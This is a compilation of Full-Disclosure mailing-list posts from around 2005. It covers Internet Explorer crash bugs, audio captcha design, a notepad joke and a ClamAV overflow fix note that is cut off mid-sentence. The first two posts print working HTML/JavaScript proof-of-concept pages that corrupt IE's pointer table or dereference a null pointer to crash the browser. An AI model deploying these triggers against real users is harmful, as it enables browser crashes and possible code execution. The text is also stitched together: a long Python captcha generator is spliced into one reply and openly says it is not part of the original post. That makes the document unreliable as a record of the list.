[Full-disclosure] IE crash
I can't find any info on this delicious IE bug, but it seems to be publicly known:

  <input type=checkbox id='c'>
  <script>
    r=document.getElementById(c);
    a=r.createTextRange();
  </script>

It will badly access a (virtual?) pointer table, making EIP jump to a random address. This has various effects on the system I've tested with, including crashing.

It works on these versions of mshtml.dll:

  XP SP2:  6.0.2900.2802 - latest
  WS2003:  6.0.3790.0

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fun with DHTML
H D Moore wrote:
> How many bugs can you find in your browser? The recent IE issues only
> scratched the surface of the DHTML/behavior bugs. The HTML/JS page
> below can be used to find all sorts of bugs in different browsers.
> I stopped caring about these after the first three invalid dereferences.
>
> http://metasploit.com/users/hdm/tools/hamachi/hamachi.html

Nice work!

On the IE front, besides the now known createTextRange() problem, no other high risk behavior is observed. However, your tool will uncover a *new, low risk IE vulnerability* (DoS).

When using the removeAttribute() method on certain HTML elements, a NULL pointer is accessed, leading to a browser crash. The vulnerable elements are FORM, TABLE, and SELECT:

  <body onload='nullptr()'>
  <select id='s'>
  <script>
    function nullptr(){
      a=document.getElementById('s').removeAttribute(0);
    }
  </script>
  </body>
Re: [Full-disclosure] defeating voice captchas
Gadi Evron wrote:
> Therefore, how many times does one have to refresh the page and listen
> to the Captcha to be able to simply learn to identify the Captcha by
> say, an MD5 hash of the audio for each letter?

That is just a bad implementation, when done well audio Captchas are probably as secure as their visual counterparts.

Done well means that, besides the 10 digits (and/or 26 letters) recorded by the sexy voice and replayed in a random order, the audio is mixed with multiple sound sources, different for each generated Captcha. For example, you can use a symphony(*), random white noise, the sound of the street, or all of these, at a level of 3 or 6 dB above the voice. The brain can easily distinguish the secret code from all the background noise, but it's much more difficult for a computer.

While I'm not an audio expert either, I'm sure this problem is a lot harder than a simple MD5 - just look how badly state of the art voice recognition software performs in almost ideal conditions, i.e. no background noise etc.

(*) Of course, it's better to use sound sources that are hard to identify, and are ideally not available to the attacker; else he could obtain the same sounds and subtract them from the audio. I think some random pitch shifting (tremolo) would help against this.
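The scheme the reply above describes (digits replayed in a random order, several background sources mixed in at 3 or 6 dB above the voice, a small random pitch shift on each digit) carried through in code, as an added example that is not part of the original post or of any Captcha product: every clip is a synthetic stand-in built from sine tones and a PRNG rather than a recording, and the sample rate, clip lengths and the 0.9-1.1 pitch-shift range are assumptions. The piece a deployer actually needs to get right is `mix_at_level`, which derives the background gain from RMS so that the stated dB margin holds instead of being guessed.

```python
import math
import random
import string

RATE = 8000  # assumed sample rate in Hz; all clips below are synthetic stand-ins


def rms(samples):
    """Root-mean-square amplitude of a clip (the loudness reference used for dB)."""
    return math.sqrt(sum(s * s for s in samples) / len(samples))


def db_to_gain(level_db):
    """Amplitude ratio corresponding to a level difference in decibels."""
    return 10.0 ** (level_db / 20.0)


def level_db_above(reference, other):
    """How many dB louder `other` is than `reference` (negative if quieter)."""
    return 20.0 * math.log10(rms(other) / rms(reference))


def tone(freqs, n, amp=0.3):
    """Constructed stand-in for a recording: an average of sines at the given frequencies."""
    return [amp * sum(math.sin(2 * math.pi * f * i / RATE) for f in freqs) / len(freqs)
            for i in range(n)]


def pitch_shift(samples, factor):
    """Resample by linear interpolation; factor > 1 raises pitch and shortens the clip."""
    out = []
    for j in range(int(len(samples) / factor)):
        pos = j * factor
        i, frac = int(pos), pos - int(pos)
        a = samples[i]
        b = samples[i + 1] if i + 1 < len(samples) else a
        out.append(a + (b - a) * frac)
    return out


def combine_sources(sources, length, rng):
    """Sum several background sources, each normalised to unit RMS and looped from a random offset."""
    total = [0.0] * length
    for src in sources:
        gain, offset = 1.0 / rms(src), rng.randrange(len(src))
        for i in range(length):
            total[i] += gain * src[(offset + i) % len(src)]
    return total


def mix_at_level(voice, background, level_db):
    """Scale background so its RMS sits exactly level_db above the voice RMS, then add the two."""
    gain = db_to_gain(level_db) * rms(voice) / rms(background)
    scaled = [gain * b for b in background]
    return [v + b for v, b in zip(voice, scaled)], scaled


def random_code(rng, length=6):
    """The secret the listener must type: digits chosen at random."""
    return "".join(rng.choice(string.digits) for _ in range(length))


def build_audio_captcha(digit_clips, code, noise_sources, level_db, rng):
    """Return (mixed, voice, background); voice = digits with a random pitch shift and gaps."""
    voice = []
    for d in code:
        voice.extend(pitch_shift(digit_clips[d], rng.uniform(0.9, 1.1)))
        voice.extend([0.0] * (RATE // 20))  # 50 ms of silence between digits
    background = combine_sources(noise_sources, len(voice), rng)
    mixed, scaled = mix_at_level(voice, background, level_db)
    return mixed, voice, scaled


# Constructed sample material (no real recordings): one short tone per digit.
DIGIT_CLIPS = {d: tone([300 + 40 * int(d)], RATE // 5) for d in string.digits}


def demo(seed=7, level_db=6.0):
    """Generate one Captcha with three constructed backgrounds standing in for the
    symphony, white noise and street sounds the post suggests."""
    rng = random.Random(seed)
    sources = [
        tone([262, 330, 392], RATE),                    # chord, symphony stand-in
        [rng.uniform(-1.0, 1.0) for _ in range(RATE)],  # white noise
        tone([60, 90], RATE, amp=0.5),                  # low rumble, street stand-in
    ]
    code = random_code(rng)
    mixed, voice, background = build_audio_captcha(DIGIT_CLIPS, code, sources, level_db, rng)
    return code, mixed, voice, background


if __name__ == "__main__":
    code, mixed, voice, background = demo()
    print("code:", code, "background is %.1f dB above voice" % level_db_above(voice, background))
```

`level_db_above` is the check worth running on generated samples before shipping: at 6 dB the background RMS is roughly twice the voice RMS, so a mixing bug that silently drops a source or scales by sample peak instead of RMS shows up as the wrong number straight away. Because each Captcha draws fresh offsets, pitch factors and a fresh code, two requests never share the same background waveform, which is what defeats the per-letter hash lookup the quoted question describes.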
Re: [Full-disclosure] Window's O/S
jacob jango wrote:
> create a folder on desktop and name it as notepad. open internet
> explorer go to view source code this will open the contents of notepad
> folder!!

Even better: rename any exe to notepad.exe ;)
Re: [Full-disclosure] Re: ClamAV Multiple Rem0te Buffer Overflows
nick wrote:
> The clamav.net front page says Latest ClamAV stable release is: 0.86.2.
> Is this included in your advisory?

clamav 0.86.2 released (Mon, 25 Jul 2005 00:35:58 GMT)

Notes: 0.86.2
-- Changes in this release include fixes for three possible integer overflows in libclamav,